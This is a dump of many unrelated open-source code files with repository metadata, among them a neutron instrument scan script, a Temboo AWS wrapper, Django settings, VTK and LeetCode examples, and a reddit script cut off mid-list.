logger.warning('result UNKNOW -> %.30r' % result)
return
def quit(self):
self._quit = True
def run(self):
'''Run loop'''
logger.info("result_worker starting...")
while not self._quit:
try:
task, result = self.inqueue.get(timeout=1)
self.on_result(task, result)
except Queue.Empty as e:
continue
except KeyboardInterrupt:
break
except AssertionError as e:
logger.error(e)
continue
except Exception as e:
logger.exception(e)
continue
logger.info("result_worker exiting...")
class OneResultWorker(ResultWorker):
'''Result Worker for one mode, write results to stdout'''
def on_result(self, task, result):
'''Called every result'''
if not result:
return
if 'taskid' in task and 'project' in task and 'url' in task:
logger.info('result %s:%s %s -> %.30r' % (
task['project'], task['taskid'], task['url'], result))
print(json.dumps({
'taskid': task['taskid'],
'project': task['project'],
'url': task['url'],
'result': result,
'updatetime': time.time()
}))
else:
logger.warning('result UNKNOW -> %.30r' % result)
return
| [
"binhui.ni@yourdream.cc"
] | binhui.ni@yourdream.cc |
71e40389f60fb122edde1239c65f8e55412083f9 | 9d7d69178c6f1f1db6ed6767e0af32bfe836549c | /new_workspace/Gumtree_Workspace/Magnet/Yick/P9363/100 Alignment/20210130/Overnight/2021_Jan_Yick_scan_time_56_1K_125Oe_ZFC_40min.py | 9cf66fe21d2297a88318f687b3e726608073a945 | [] | no_license | Gumtree/Quokka_scripts | 217958288b59adbdaf00a9a13ece42f169003889 | c9687d963552023d7408a8530005a99aabea1697 | refs/heads/master | 2023-08-30T20:47:32.142903 | 2023-08-18T03:38:09 | 2023-08-18T03:38:09 | 8,191,387 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,299 | py | histmem preset 60
histmem mode time
#Time scan
#-----------------------------------------------------------------
#System reset (15 minutes)
hset /sample/tc1/control/tolerance1 1
drive ma1_setpoint 0
drive tc1_driveable 90
wait 10
drive tc1_driveable 4
drive ma1_setpoint 125
wait 10
hset /sample/tc1/control/tolerance1 0.2
drive tc1_driveable 50
# drive tc1_driveable 52
drive tc1_driveable 54
# drive tc1_driveable 54
drive tc1_driveable 55.5
hset /sample/tc1/control/tolerance1 0.1
drive tc1_driveable 56.1
wait 10
#-----------------------------------------------------------------
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
# 10 minutes
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
# 20 minutes
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
# 30 minutes
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
newfile HISTOGRAM_XY
histmem start block
save
histmem stop
# 40 minutes
| [
"quokka@DAV5-QUOKKA.nbi.ansto.gov.au"
] | quokka@DAV5-QUOKKA.nbi.ansto.gov.au |
068bfe1d684059513b8ff1b15160ec145471ffc3 | 44064ed79f173ddca96174913910c1610992b7cb | /Second_Processing_app/temboo/Library/Amazon/IAM/GetGroupPolicy.py | f85f2b09ae61777531adae6278c6723fdd2e9698 | [] | no_license | dattasaurabh82/Final_thesis | 440fb5e29ebc28dd64fe59ecd87f01494ed6d4e5 | 8edaea62f5987db026adfffb6b52b59b119f6375 | refs/heads/master | 2021-01-20T22:25:48.999100 | 2014-10-14T18:58:00 | 2014-10-14T18:58:00 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,397 | py | # -*- coding: utf-8 -*-
###############################################################################
#
# GetGroupPolicy
# Retrieves the specified policy document for the specified group.
#
# Python version 2.6
#
###############################################################################
from temboo.core.choreography import Choreography
from temboo.core.choreography import InputSet
from temboo.core.choreography import ResultSet
from temboo.core.choreography import ChoreographyExecution
import json
class GetGroupPolicy(Choreography):
def __init__(self, temboo_session):
"""
Create a new instance of the GetGroupPolicy Choreo. A TembooSession object, containing a valid
set of Temboo credentials, must be supplied.
"""
Choreography.__init__(self, temboo_session, '/Library/Amazon/IAM/GetGroupPolicy')
def new_input_set(self):
return GetGroupPolicyInputSet()
def _make_result_set(self, result, path):
return GetGroupPolicyResultSet(result, path)
def _make_execution(self, session, exec_id, path):
return GetGroupPolicyChoreographyExecution(session, exec_id, path)
class GetGroupPolicyInputSet(InputSet):
"""
An InputSet with methods appropriate for specifying the inputs to the GetGroupPolicy
Choreo. The InputSet object is used to specify input parameters when executing this Choreo.
"""
def set_AWSAccessKeyId(self, value):
"""
Set the value of the AWSAccessKeyId input for this Choreo. ((required, string) The Access Key ID provided by Amazon Web Services.)
"""
InputSet._set_input(self, 'AWSAccessKeyId', value)
def set_AWSSecretKeyId(self, value):
"""
Set the value of the AWSSecretKeyId input for this Choreo. ((required, string) The Secret Key ID provided by Amazon Web Services.)
"""
InputSet._set_input(self, 'AWSSecretKeyId', value)
def set_GroupName(self, value):
"""
Set the value of the GroupName input for this Choreo. ((required, string) The name of the group to return.)
"""
InputSet._set_input(self, 'GroupName', value)
def set_PolicyName(self, value):
"""
Set the value of the PolicyName input for this Choreo. ((required, string) Name of the policy document to get.)
"""
InputSet._set_input(self, 'PolicyName', value)
def set_ResponseFormat(self, value):
"""
Set the value of the ResponseFormat input for this Choreo. ((optional, string) The format that the response should be in. Valid values are "xml" (the default) and "json".)
"""
InputSet._set_input(self, 'ResponseFormat', value)
class GetGroupPolicyResultSet(ResultSet):
"""
A ResultSet with methods tailored to the values returned by the GetGroupPolicy Choreo.
The ResultSet object is used to retrieve the results of a Choreo execution.
"""
def getJSONFromString(self, str):
return json.loads(str)
def get_Response(self):
"""
Retrieve the value for the "Response" output from this Choreo execution. (The response from Amazon.)
"""
return self._output.get('Response', None)
class GetGroupPolicyChoreographyExecution(ChoreographyExecution):
def _make_result_set(self, response, path):
return GetGroupPolicyResultSet(response, path)
| [
"dattasaurabh82@gmail.com"
] | dattasaurabh82@gmail.com |
44153f43db578ddeaf085d737762fe112938c9e7 | eb79c567ca500b39e268eb270c792688a20b1f08 | /generatePage.py | 4c7ad31a6e6ca54e0c7c6645be1c034961e043c9 | [] | no_license | RickeyEstes2/arxiv-equations | db746ba993a2a6ad9907594e15e6148acd52ac85 | 93047961d9de04d7aa79635a6f59a8680242637b | refs/heads/master | 2023-03-16T12:19:41.378386 | 2018-11-26T05:20:06 | 2018-11-26T05:20:06 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,666 | py | #!/usr/bin/env python
# This script will read in a pickle that includes extracted metadata and
# equations from an article, and general yaml (with front end matter) to
# render into a page.
import pickle
import operator
import frontmatter
import os
import sys
from helpers import get_equation_counts
input_pkl = sys.argv[1]
# We should be in directory where script is running
here = os.path.abspath(os.path.dirname(__file__))
os.chdir(here)
posts = '%s/_posts' %here
if not os.path.exists(here):
os.mkdir(here)
# result.keys()
# dict_keys(['equations', 'metadata', 'inputFile', 'latex', 'uid']
################################################################################
# ARTICLE TEMPLATE
################################################################################
# Don't continue unless we have metrics file
if not os.path.exists(input_pkl):
print('Cannot find metrics file, exiting')
sys.exit(1)
result = pickle.load(open(input_pkl,'rb'))
template = frontmatter.load('%s/templates/article-template.md' %here)
template.content = result['metadata']['summary']
# Add metadata to template, only specific fields
template.metadata['id'] = result['metadata']['id']
template.metadata['updated'] = result['metadata']['updated']
template.metadata['published'] = result['metadata']['published']
# Parse year, month, day
month = result['metadata']['published_parsed'].tm_mon
day = result['metadata']['published_parsed'].tm_mday
year = result['metadata']['published_parsed'].tm_year
template.metadata['published_month'] = month
template.metadata['published_day'] = day
template.metadata['published_year'] = year
template.metadata['title'] = result['metadata']['title']
template.metadata['search_query'] = result['metadata']['title_detail']['base']
template.metadata['title_detail'] = result['metadata']['title_detail']['value']
template.metadata['authors'] = result['metadata']['authors']
template.metadata['comment'] = result['metadata']['arxiv_comment']
# Parse links into list
links = []
for link in result['metadata']['links']:
links.append(link['href'])
template.metadata['links'] = links
template.metadata['category'] = result['metadata']['arxiv_primary_category']['term']
template.metadata['topic'] = result['metadata']['arxiv_primary_category']['term']
# Tags
tags = []
for tag in result['metadata']['tags']:
tags.append(tag['term'])
template.metadata['tags'] = tags
template.metadata['pdf_url'] = result['metadata']['pdf_url']
template.metadata['arxiv_url'] = result['metadata']['arxiv_url']
# Equations
raw = [e.replace('\\\\','\\') for e in result['equations']]
# Let's count instead
equations = get_equation_counts(raw)
# Get total count to calculate percent
total = 0
for e,count in equations.items():
total += count
# Let's make total width 900px
# Ensure is sorted
equation_list = []
for item in sorted(equations.items(), key=operator.itemgetter(1)):
percent = item[1] / total
pixels = round(percent * 900, 0)
equation_list.append({'equation': item[0],
'count': item[1],
'pixels': pixels,
'percent': round(100*percent,2) })
# Greatest to least
equation_list.reverse()
template.metadata['equations'] = equation_list
template.metadata['equations_total'] = total
# Write to File
output_dir = os.path.abspath('%s/_posts/%s/%s' % (here, year, month))
if not os.path.exists(output_dir):
os.makedirs(output_dir)
outfile = os.path.join(output_dir, '%s-%02d-%02d-%s.md' %(year, month, day, result['uid'].replace('/','-')))
with open(outfile, 'w') as filey:
filey.writelines(frontmatter.dumps(template))
| [
"vsochat@stanford.edu"
] | vsochat@stanford.edu |
3148c6e92aa0af98497ad72eadb37962a9b50cd9 | 92065e3b378edc8e0570e4295aca0968de3c852d | /rosalind_frmt.py | c3178a9ffd4e87839daefb1e149757e2ceb3005d | [] | no_license | sunhuaiyu/rosalind | 18dc9fa78aaa84b478b112089a3b94d0f442b1bb | 7181cc9215d3ea0b5ad9d0811c00e01fd9f20b1c | refs/heads/master | 2020-04-04T17:53:17.437595 | 2019-04-11T17:03:52 | 2019-04-11T17:03:52 | 25,007,403 | 5 | 2 | null | null | null | null | UTF-8 | Python | false | false | 404 | py | # sun.huaiyu
# gbk
from Bio import Entrez, SeqIO
Entrez.email = 'hsun@salk.edu'
f = open('rosalind_frmt.txt')
ids = f.readline().split()
handle = Entrez.efetch(db='nucleotide', id=[', '.join(ids)], rettype='fasta')
records = list(SeqIO.parse(handle, 'fasta'))
shortest = sorted(records, key=lambda x: len(x.seq))[0]
f = open('rosalind_frmt_ans.txt', 'wt')
f.write(shortest.format('fasta'))
f.close()
| [
"noreply@github.com"
] | sunhuaiyu.noreply@github.com |
3ec6354d03c41e1a6cb36925667ad36dcc433e98 | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/nouns/_issue.py | 00ab7aacb2f25fe5d71d73b0fb32f899b9120904 | [
"MIT"
] | permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 823 | py |
#calss header
class _ISSUE():
def __init__(self,):
self.name = "ISSUE"
self.definitions = [u'a subject or problem that people are thinking and talking about: ', u'most important in what is being discussed: ', u'to make something seem more important than it should be, or to argue about it: ', u'to disagree strongly: ', u'to have difficulty or disagreement with someone or something: ', u'a set of newspapers or magazines published at the same time or a single copy of a newspaper or magazine: ', u'An issue of shares is a time when a company gives people the chance to buy part of it or gives extra shares to people who already own some.']
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.specie = 'nouns'
def run(self, obj1 = [], obj2 = []):
return self.jsondata
| [
"xingwang1991@gmail.com"
] | xingwang1991@gmail.com |
4d48ca0b1e607e8bfce731a23c9d6dde8dd48770 | a680b681210a070ff6ac3eab4ed3ea5a125991d6 | /spider/instances/inst_fetch.py | 487fe1d57881e518171e2bb08fc2984b632fe21c | [
"BSD-2-Clause"
] | permissive | moonbirdxp/PSpider | bb6da1de6a78d86ee8704b6eb8981773a1a31d8c | 4d7238b4ebafd129ecc5dd1095ce1ece313945ec | refs/heads/master | 2020-06-22T03:46:17.320420 | 2019-07-16T03:26:20 | 2019-07-16T04:44:17 | 197,624,496 | 0 | 0 | BSD-2-Clause | 2019-10-15T01:04:19 | 2019-07-18T16:48:09 | Python | UTF-8 | Python | false | false | 1,711 | py | # _*_ coding: utf-8 _*_
"""
inst_fetch.py by xianhu
"""
import time
import random
class Fetcher(object):
"""
class of Fetcher, must include function working()
"""
def __init__(self, sleep_time=0, max_repeat=3):
"""
constructor
:param sleep_time: default 0, sleeping time after a fetching
:param max_repeat: default 3, maximum repeat count of a fetching
"""
self._sleep_time = sleep_time
self._max_repeat = max_repeat
return
def working(self, priority: int, url: str, keys: dict, deep: int, repeat: int, proxies=None) -> (int, object, int):
"""
working function, must "try, except" and don't change the parameters and returns
:return fetch_state: can be -1(fetch failed), 0(need repeat), 1(fetch success)
:return content: can be any object, or exception information[class_name, excep]
:return proxies_state: can be -1(unavaiable), 0(return to queue), 1(avaiable)
"""
time.sleep(random.randint(0, self._sleep_time))
try:
fetch_state, content, proxies_state = self.url_fetch(priority, url, keys, deep, repeat, proxies=proxies)
except Exception as excep:
fetch_state, content, proxies_state = (-1 if repeat >= self._max_repeat else 0), [self.__class__.__name__, str(excep)], -1
return fetch_state, content, proxies_state
def url_fetch(self, priority: int, url: str, keys: dict, deep: int, repeat: int, proxies=None) -> (int, object, int):
"""
fetch the content of a url, you must overwrite this function, parameters and returns refer to self.working()
"""
raise NotImplementedError
| [
"qixianhu@qq.com"
] | qixianhu@qq.com |
ba8e796d0931eec1c2ee5edeb7c0e03f0475c60a | 482b695d09d721d2d1731cf50e3928e058e44916 | /src/Python/StructuredPoints/Vol.py | bd3d72e56d26d82c9969ed3d20b53525bd0b1dff | [
"Apache-2.0"
] | permissive | numminorih/vtk-examples | b9d5c35f62dc287c6633b05ab4fb14033100bee8 | 2e3922a61cf4ef428c013d56d754742ff880b3cf | refs/heads/master | 2023-07-29T05:56:23.235478 | 2021-09-07T22:58:41 | 2021-09-07T22:58:41 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,639 | py | #!/usr/bin/env python
import vtk
def main():
colors = vtk.vtkNamedColors()
renderer = vtk.vtkRenderer()
renWin = vtk.vtkRenderWindow()
renWin.AddRenderer(renderer)
iren = vtk.vtkRenderWindowInteractor()
iren.SetRenderWindow(renWin)
vol = vtk.vtkStructuredPoints()
vol.SetDimensions(26, 26, 26)
vol.SetOrigin(-0.5, -0.5, -0.5)
sp = 1.0 / 25.0
vol.SetSpacing(sp, sp, sp)
scalars = vtk.vtkDoubleArray()
scalars.SetNumberOfComponents(1)
scalars.SetNumberOfTuples(26 * 26 * 26)
for k in range(0, 26):
z = -0.5 + k * sp
kOffset = k * 26 * 26
for j in range(0, 26):
y = -0.5 + j * sp
jOffset = j * 26
for i in range(0, 26):
x = -0.5 + i * sp
s = x * x + y * y + z * z - (0.4 * 0.4)
offset = i + jOffset + kOffset
scalars.InsertTuple1(offset, s)
vol.GetPointData().SetScalars(scalars)
contour = vtk.vtkContourFilter()
contour.SetInputData(vol)
contour.SetValue(0, 0.0)
volMapper = vtk.vtkPolyDataMapper()
volMapper.SetInputConnection(contour.GetOutputPort())
volMapper.ScalarVisibilityOff()
volActor = vtk.vtkActor()
volActor.SetMapper(volMapper)
volActor.GetProperty().EdgeVisibilityOn()
volActor.GetProperty().SetColor(colors.GetColor3d('Salmon'))
renderer.AddActor(volActor)
renderer.SetBackground(colors.GetColor3d('SlateGray'))
renWin.SetSize(512, 512)
renWin.SetWindowName('Vol')
# Interact with the data.
renWin.Render()
iren.Start()
if __name__ == '__main__':
main()
| [
"andrew.amaclean@gmail.com"
] | andrew.amaclean@gmail.com |
373bef96a622b1cfeedf8d9879a96af87bfd9e46 | f8e8e365c9cf58b61d72655bc2340baeaed5baff | /Leetcode/Python Solutions/Binary Trees/UnivaluedBinaryTree.py | 3ed40370aac53df28bfef683b6d36e893ee4ed0e | [
"MIT"
] | permissive | Mostofa-Najmus-Sakib/Applied-Algorithm | 39a69f6b9ed113efe4a420d19cad79e0aa317637 | bc656fd655617407856e0ce45b68585fa81c5035 | refs/heads/master | 2023-08-31T19:54:34.242559 | 2021-11-05T03:43:35 | 2021-11-05T03:43:35 | 412,263,430 | 0 | 0 | MIT | 2021-09-30T23:45:29 | 2021-09-30T23:45:25 | null | UTF-8 | Python | false | false | 2,071 | py | """
LeetCode Problem:965. Univalued Binary Tree
Link: https://leetcode.com/problems/univalued-binary-tree/
Language: Python
Written by: Mostofa Adib Shakib
Two versions of the solution
Version 1(Recursive using DFS):
In this version of the solution we use a dfs helper method to compare every node in the true. If the value of every node is not equal to the
root node we return False. This method is faster as it doesn't iterative every node.
Version 2(Iteratively using In-Order traversal):
In this version of the solution we use a stack. We push all the left child of a node into the stack up until we reach a Null node.
If we reach a Null node and the stack is not empty then we pop an element from the stack and and compare it's value with the root node
if they are equal then we append it's right child to the stack or else we return False. This method is a bit slower as we are iterating over
all the left child of a node before comparing it's value with the root node.
"""
# Definition for a binary tree node.
# class TreeNode(object):
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
# Version 1(Recursion using DFS)
class Solution(object):
def isUnivalTree(self, root):
"""
:type root: TreeNode
:rtype: bool
"""
def dfs(root,val):
if not root: return True
return root.val == val and dfs(root.left,val) and dfs(root.right,val)
return dfs(root,root.val)
# Version 2(Iteratively using In-Order traversal)
class Solution(object):
def isUnivalTree(self, root):
"""
:type root: TreeNode
:rtype: bool
"""
if not root: return True
curr = root
stack = []
while True:
if curr is not None:
stack.append(curr)
curr = curr.left
elif stack:
curr = stack.pop()
if root.val != curr.val:
return False
curr = curr.right
else:
break
return True | [
"adibshakib@gmail.com"
] | adibshakib@gmail.com |
7c2f2a6315e31fdfcbb25564c9f2140caa632aab | c72cde3c84b4c3ed1180f5e88a30780a90a70075 | /source/accounts/migrations/0004_auto_20191101_1520.py | 150d17738d1a16ee4602fb5d52c475c89c795da5 | [] | no_license | Aisuluu1405/python_group_3_homework_49_Aisulu_Dzhusupova | a88187e34a71c282eedd08c2616c66a19daef356 | 6fbf0a57dfc85ebd8203142f6b903228c67b1051 | refs/heads/master | 2022-11-28T18:32:32.732140 | 2019-12-09T14:11:01 | 2019-12-09T14:11:01 | 211,069,782 | 0 | 0 | null | 2022-11-22T04:47:28 | 2019-09-26T11:09:26 | Python | UTF-8 | Python | false | false | 590 | py | # Generated by Django 2.2 on 2019-11-01 15:20
from django.db import migrations
def create_user_profiles(apps, schema_editor):
User = apps.get_model('auth', 'User')
UserProfile = apps.get_model('accounts', 'UserProfile')
for user in User.objects.all():
UserProfile.objects.get_or_create(user=user)
def drop_user_profiles(apps, schema_editor):
pass
class Migration(migrations.Migration):
dependencies = [
('accounts', '0003_auto_20191101_0536'),
]
operations = [
migrations.RunPython(create_user_profiles, drop_user_profiles)
]
| [
"aisuluueco2009@yandex.ru"
] | aisuluueco2009@yandex.ru |
94400f966a70ee4add2a8083778d5eb0fba7eaca | 05857cd30669a914d69ce872141964a4e6b31edd | /sample.py | 2cc30d2240966d3dfd725f69d94e80076a8fa628 | [] | no_license | EricSchles/test_naming | f61e0900835edbbd7f5054e1916e38647f460e9e | a9be0cc48c40b704c7970968458db3631c8116e2 | refs/heads/master | 2021-01-17T12:21:09.588993 | 2014-11-05T00:11:34 | 2014-11-05T00:11:34 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 233 | py | class Foo:
def __init__(self,first,second):
self.first = first
self.second = second
def adder(self):
return self.first + self.second
def multipler(self):
return self.first * self.second
| [
"ericschles@gmail.com"
] | ericschles@gmail.com |
44dd986a455b97ff422c59570f460e119a19fc12 | 3496ead97ad993b8c32ff6f96cf3474110baef79 | /thisisproject/settings.py | d7c2755ccda782a22425d6f608116a620dfddfd3 | [] | no_license | vpgrishkin/django-channels-celery-jokes | 7e7d5b71110f14ef08c2e684ae89c39cd321b219 | b617cc97e8f9ad0710f6bd6de122749263b28c18 | refs/heads/master | 2020-03-31T08:48:01.011142 | 2018-06-17T06:16:32 | 2018-06-17T06:16:32 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,276 | py | import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.0/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = "hzk=g8z3=*xds6zkaol*enq+^)b8_5knm6=gygewnc3yt3urg3"
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
"django.contrib.admin",
"django.contrib.auth",
"django.contrib.contenttypes",
"django.contrib.sessions",
"django.contrib.messages",
"django.contrib.staticfiles",
"channels",
"jokes.apps.JokesConfig",
]
MIDDLEWARE = [
"django.middleware.security.SecurityMiddleware",
"django.contrib.sessions.middleware.SessionMiddleware",
"django.middleware.common.CommonMiddleware",
"django.middleware.csrf.CsrfViewMiddleware",
"django.contrib.auth.middleware.AuthenticationMiddleware",
"django.contrib.messages.middleware.MessageMiddleware",
"django.middleware.clickjacking.XFrameOptionsMiddleware",
]
ROOT_URLCONF = "thisisproject.urls"
TEMPLATES = [
{
"BACKEND": "django.template.backends.django.DjangoTemplates",
"DIRS": [],
"APP_DIRS": True,
"OPTIONS": {
"context_processors": [
"django.template.context_processors.debug",
"django.template.context_processors.request",
"django.contrib.auth.context_processors.auth",
"django.contrib.messages.context_processors.messages",
]
},
}
]
WSGI_APPLICATION = "thisisproject.wsgi.application"
# Database
# https://docs.djangoproject.com/en/2.0/ref/settings/#databases
DATABASES = {
"default": {
"ENGINE": "django.db.backends.sqlite3",
"NAME": os.path.join(BASE_DIR, "db.sqlite3"),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
"NAME": "django.contrib.auth.password_validation.UserAttributeSimilarityValidator"
},
{"NAME": "django.contrib.auth.password_validation.MinimumLengthValidator"},
{"NAME": "django.contrib.auth.password_validation.CommonPasswordValidator"},
{"NAME": "django.contrib.auth.password_validation.NumericPasswordValidator"},
]
# Internationalization
# https://docs.djangoproject.com/en/2.0/topics/i18n/
LANGUAGE_CODE = "en-us"
TIME_ZONE = "UTC"
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.0/howto/static-files/
STATIC_URL = "/static/"
# Celery
CELERY_BROKER_URL = "redis://redis:6379/0"
CELERY_ACCEPT_CONTENT = ["json"]
CELERY_TASK_SERIALIZER = "json"
CELERY_RESULT_SERIALIZER = "json"
CELERY_BEAT_SCHEDULE = {
"get_random_joke": {"task": "jokes.tasks.get_random_joke", "schedule": 15.0}
}
# Channels
ASGI_APPLICATION = "thisisproject.routing.application"
CHANNEL_LAYERS = {
"default": {
"BACKEND": "channels_redis.core.RedisChannelLayer",
"CONFIG": {"hosts": [("redis", 6379)]},
}
}
| [
"denis.orehovsky@gmail.com"
] | denis.orehovsky@gmail.com |
bebe9062b31f8a9800ce2d05f8bdc7ae7ac81e36 | 6ed034d0a5e239d7b0c528b287451409ffb4a494 | /mmpose/core/camera/__init__.py | a4a3c5526560996791a85f0d84a72a66286486ca | [
"Apache-2.0"
] | permissive | ViTAE-Transformer/ViTPose | 8f9462bd5bc2fb3e66de31ca1d03e5a9135cb2bf | d5216452796c90c6bc29f5c5ec0bdba94366768a | refs/heads/main | 2023-05-23T16:32:22.359076 | 2023-03-01T06:42:22 | 2023-03-01T06:42:22 | 485,999,907 | 869 | 132 | Apache-2.0 | 2023-03-01T06:42:24 | 2022-04-27T01:09:19 | Python | UTF-8 | Python | false | false | 232 | py | # Copyright (c) OpenMMLab. All rights reserved.
from .camera_base import CAMERAS
from .single_camera import SimpleCamera
from .single_camera_torch import SimpleCameraTorch
__all__ = ['CAMERAS', 'SimpleCamera', 'SimpleCameraTorch']
| [
"annblessus@gmail.com"
] | annblessus@gmail.com |
b13bca55632de5a3c7d5819f798989c93fc5fbe1 | 98cd5ddf45a73aea64bbfac0c0104829d7231b81 | /S - Grid Slide Square - Filled/info.py | 3a06687be68f63f5b6e0b36197f1252211343cde | [] | no_license | atheis4/ETC_Modes_Extra | 42508d523cfe632a3335e29f6e1e40af91df231b | d0ce221562105382a7a73cc6d280f4ad0eabf6f3 | refs/heads/master | 2022-04-04T11:15:07.335910 | 2020-01-03T20:27:32 | 2020-01-03T20:27:32 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 261 | py | name = "S - Grid Slide Square - Filled"
description = "Grid of oscillating filled squares with LFO-controlled sliding rows with animated color fade"
knob1 = "Slide LFO speed"
knob2 = "Slide LFO range"
knob3 = "Size"
knob4 = "Color"
released = "March 18 2019"
| [
"media@critterandguitari.com"
] | media@critterandguitari.com |
7eada46e184e56ffe1faad35d8e3ba614acbbfa3 | bb31c0062354bbb0df70692e904c949a00973503 | /21_list_pop.py | 0426fabad056ce4b67e15136066a60f3c05bd401 | [] | no_license | millanmilu/Learn-Python-with-Milu- | c42df5aa7832fba75015b7af29d6009489e00ec5 | 3b4714b849dff0a0ef3cc91fd102840fbcf00e43 | refs/heads/master | 2022-04-26T03:29:38.990189 | 2020-04-28T13:17:28 | 2020-04-28T13:17:28 | 259,634,227 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 799 | py | names = ['milu', 'Misan', 'millan', 'Babloo', 'anil']
print("It delete items from end of the list ")
names.pop()
print(names)
print("pop(0) returns the head (start), pop() or pop(-1) returns the tail(end)")
print(names.pop(0))
print(" LIFO -LAST IN ,FIRST OUT ;FIFO - FIRST IN ,FIRST OUT")
"""It’s computing jargon time! Don’t worry, these
won’t be on the final exam. If you use append() to
add new items to the end and pop() to remove
them from the same end, you’ve implemented a
data structure known as a LIFO (last in, first out)
queue. This is more commonly known as a stack.
pop(0) would create a FIFO (first in, first out)
queue. These are useful when you want to collect
data as they arrive and work with either the oldest
first (FIFO) or the newest first (LIFO).""" | [
"noreply@github.com"
] | millanmilu.noreply@github.com |
5d02854a055be280f4890d03f09c82e468df1e6f | f25d477be296a63aac156c8dd907397dc156024c | /vse/handlers/test.py | 421833f5a7e1c7a36c32d33ccd95e6f2e490ca40 | [] | no_license | cbaxter1988/validation_scripting_engine | f4e0a834632b5499c4d7a13b18d9208b27296325 | 86a8bd5061016f838747ea045bf3e32c0dd98e94 | refs/heads/master | 2022-11-23T05:23:05.343104 | 2020-07-22T06:55:47 | 2020-07-22T06:55:47 | 275,946,469 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 553 | py | from vse.handlers import Handler, HandlerResult
class TestHandler(Handler):
def __init__(self, **kwargs):
super().__init__(**kwargs)
def execute(self, **kwargs) -> HandlerResult:
poked = self.params.get("poked", False)
if poked:
self.result.status = True
self.result.msg = "Hey, You Poked Me"
else:
# print(self.params)
self.result.status = False
self.result.msg = "What do you want?"
self.check_expectation()
return self.result
| [
"cbaxtertech@gmail.com"
] | cbaxtertech@gmail.com |
2a6703236f533adc6ad37da1e13ce782b2c31505 | cc0da95420131620ab5d49c48b38d038f1b67833 | /scripts/update_reddit_cache.py | 2a4e92028b31bb97d2afa82e4882bff9491f28f0 | [
"MIT"
] | permissive | madeyoga/Nano-Bot | 4daee9a74351ca64329ec33ee7b565bba4cf3616 | 3966957d229aa2e3ea9945b2d9a96fb3353b910c | refs/heads/master | 2022-06-25T17:36:41.610957 | 2022-06-13T04:03:05 | 2022-06-13T04:03:05 | 140,231,221 | 13 | 10 | MIT | 2021-09-27T11:11:19 | 2018-07-09T04:28:35 | Python | UTF-8 | Python | false | false | 1,053 | py | import os
import praw
class Subreddits:
MEMES = "memes"
DANKMEMES = "dankmemes"
WTF = "wtf"
GRANDORDER = "grandorder"
WAIFU = "Waifu"
SCATHACH = "scathach"
FGOFANART = "FGOfanart"
ANIME = "anime"
ANIMEMES = "Animemes"
AWWNIME = "awwnime"
AZURELANE = "AzureLane"
TSUNDERES = "Tsunderes"
ANIMEWALLPAPER = "Animewallpaper" # ANIME WALLPAPER ARTS
